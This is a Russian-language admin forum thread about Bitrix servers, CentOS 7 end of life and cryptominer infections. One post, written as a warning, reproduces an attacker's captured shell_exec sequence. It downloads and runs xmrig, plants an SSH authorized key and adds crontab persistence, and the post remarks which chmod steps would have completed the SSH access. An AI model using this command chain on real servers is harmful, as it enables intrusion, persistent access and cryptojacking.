Цитата |
---|
написал: Подскажите пожалуйста, про него забыли, забили или он не работает в этой версии? |
31.05.2024 18:56:53
|
|||
|
|
05.06.2024 10:08:18
При установке битрикс-окружения в /home/bitrix/www появляются restore.php и bitrixsetup.php Они же создаются при создании сайта средствами /root/menu.sh Файл restore.php позволяет восстановить из предварительно созданного бэкапа сайт. Для развертывания никаких логинов паролей (в том числе и от пользователя сервера баз данных) не надо. Что происходит? Приходит робот из облака гугла или амазона. Видит restore.php. Разворачивает заранее сделанную копию сайта. Идет в админку. Это его сайт и у него есть возможность попасть в админку. Запускает "командную строку php" В ней: echo shell_exec("cat /proc/cpuinfo | grep processor"); echo shell_exec("cat /proc/cpuinfo | grep model"); echo shell_exec("sudo -l"); echo shell_exec("curl -O echo shell_exec("mv auth_login auth_login.php"); echo shell_exec("ls /home/bitrix/www/bitrix/admin/ | grep auth_login.php"); echo shell_exec("cp /home/bitrix/www/bitrix/admin/auth_login.php /home/bitrix/www/"); echo shell_exec("ls /home/bitrix/www/ | grep auth_login.php"); echo shell_exec("curl -o /tmp/config.json echo shell_exec("curl -o /tmp/xmrig echo shell_exec("chmod 777 /tmp/xmrig"); echo shell_exec("mkdir /home/bitrix/.ssh"); echo shell_exec("curl -O echo shell_exec("cat info >> ~/.ssh/authorized_keys"); echo shell_exec("rm -rf info "); echo shell_exec("curl -o /home/bitrix/sql_backup.sql echo shell_exec("chmod 777 /home/bitrix/sql_backup.sql"); echo shell_exec("curl -O echo shell_exec("crontab -l >> conf"); echo shell_exec("crontab conf"); echo shell_exec("rm -rf conf"); echo shell_exec("crontab -l"); После этого: $ crontab -l # kletka-gym project */10 * * * * bash /home/bitrix/sql_backup.sql а там внутри wget -P /tmp И еще чуть-чуть конфигов. Вот как-то так. Снято в 22 году с работающего майнера. Замечу что в данном случае после echo shell_exec("cat info >> ~/.ssh/authorized_keys"); не хватает chmod 700 для .ssh и chmod 600 для authorized_keys Для получения ssh по ключу. Тогда майнер был не доработан. Возникает вопрос что делать? После установки битрикс-окружения/развертывания bitrix-vm cd /home/bitrix/www mv bitrixsetup.php bitrixsetup.php.1 mv restore.php restore.php.1 То же самое делать сразу же после создания сайта в его web_root. |
|||||
|
|
04.07.2024 15:24:19
1 июля 2024 года истек срок службы CentOS 7, и команда CentOS удалила свои зеркала из Интернета. Доступ к ним по-прежнему можно получить через vault.centos.org. Без обновления URL-адресов репозитория пакеты невозможно будет обновить или проверить, что приведет к ошибке: "Could not retrieve mirrorlist
ВАЖНО: Использовать репозиторий Vault НЕ НУЖНО для того, чтобы оставаться на CentOS 7 дольше, чем требуется для перехода на новый сервер. Пакеты, предоставленные в репозитории vault не получают больше обновлений. Это означает, что программное обеспечение, установленное из репозитория Vault, будет иметь неисправленные уязвимости безопасности и другие ошибки. для временного фикса базового репозитория можно использовать команды:
|
|||
|
|
05.08.2024 18:25:50
|
|||||||
|
|
17.08.2024 21:46:53
|
|||
|
|
17.08.2024 22:08:27
|
|||||
|
|
20.08.2024 19:55:51
а у меня вот такая ошибка:
Trying other mirror. To address this issue please refer to the below wiki article If above article doesn't help to resolve this issue please use One of the configured repositories failed (Veeam Backup for GNU/Linux - x86_64), and yum doesn't have enough cached data to continue. At this point the only safe thing yum can do is fail. There are a few ways to work "fix" this: 1. Contact the upstream for the repository and get them to fix the problem. 2. Reconfigure the baseurl/etc. for the repository, to point to a working upstream. This is most often useful if you are using a newer distribution release than is supported by the repository (and the packages for the previous distribution release still work). 3. Run the command with the repository temporarily disabled yum --disablerepo=veeam ... 4. Disable the repository permanently, so yum won't use it by default. Yum will then just ignore the repository until you permanently enable it again or use --enablerepo for temporary usage: yum-config-manager --disable veeam or subscription-manager repos --disable=veeam 5. Configure the failing repository to be skipped, if it is unavailable. Note that yum will try to contact the repo. when it runs most commands, so will have to try and fail each time (and thus. yum will be be much slower). If it is a very temporary problem though, this is often a nice compromise: yum-config-manager --save --setopt=veeam.skip_if_unavailable=true failure: repodata/repomd.xml from veeam: [Errno 256] No more mirrors to try. |
|
|
|
20.08.2024 20:00:22
Компания veeam ушла из рф, поэтому 403 для ру ip. С иностранных ip эта ссылка открывается без проблем. |
|||
|
|
28.09.2024 15:45:55
к репозиториям уже доступа нет? Старая версия всё? Для тестов нужна, кто нибудь ставил?
|
|
|
|
28.09.2024 15:57:18
Ставил недавно, установщик выдает ошибку установки epel, в остальном все нормально. Если поставить epel командой yum install epel-release, а потом запустить установщик, то все работает. Репозитории самого CentOS 7 естественно должны уже смотреть в Vault, mirrors уже не работают.
|
|
|
|
05.10.2024 23:28:35
Подскажите пожалуйста, как можно установить 7.5.5?
Спасибо |
|
|
|
21.10.2024 16:42:32
Ребят, тема по майнеру xmrig всё ещё актуальна. Сайт Битрикс24 портал.
Наблюдаю проблему на протяжении 3-х месяцев, скачивается и запускается по воскресеньям ночью. В первый месяц запускался через неделю, сейчас последние 2 раза период в 1 месяц. Скачивался в каталог /tmp/.bitrix, последний раз в /tmp/.tmp. Всегда под пользователем bitrix. После разворачивания bitrix env сразу убирал дефолтный сайт, тоже не люблю чтобы лишнее торчало наружу. Ставил clamav, запускал говоря ему куда складывать вирусню (/tmp/clamav_clear), когда майнер вновь скачался - антивирус поместил его содержимое с настройками в clamav_clear. После, неделю наблюдал как поведёт себя и о, чудо - xmrig нашёл свои настройки и запустился с ними, т.е. он не скачивал дистр заново. В логах не нашёл ни намёка на запуск какого-либо левого скрипта |
|
|
|
21.10.2024 17:13:25
Висит скорее всего в автозапуске из папки bitrix. Если пришел из пользователя битрикс, то это хорошая новость. Значит он мог прорваться через не обновленный сайт, без текущей защиты. Все актульные версии битрикса хорошо защищены. За год не увидел ничего нового. Скриншот этой папки bitrix пришли, содержимое. То есть его можно найти запущенным в оперативной памяти. Удаляешь процесс, удаляешь папки с вирусом, перезагружаешь... Наслаждаешься жизнью |
|||
|
|
23.10.2024 08:03:57
Надеюсь я правильно понял про содержимое каталога пользователя bitrix, а не каталога bitrix дистрибутива б24. После убийства процесса и удаления содержимого xmrig нигде нет следов, по крайней мере по тем критериям что везде описывают: sql_dump.sql, xmrig, monero, bitrix-daemon.
|
|
|
|
23.10.2024 16:18:40
Файл .rnd Все это скачай и проверь на содержание вирусов стандартным антивирусом. Еще запусти команду ps ux -u bitrix Скриншот ответа сюда. Еще скриншот папки /tmp/.bitrix/ |
||||
|
|
|||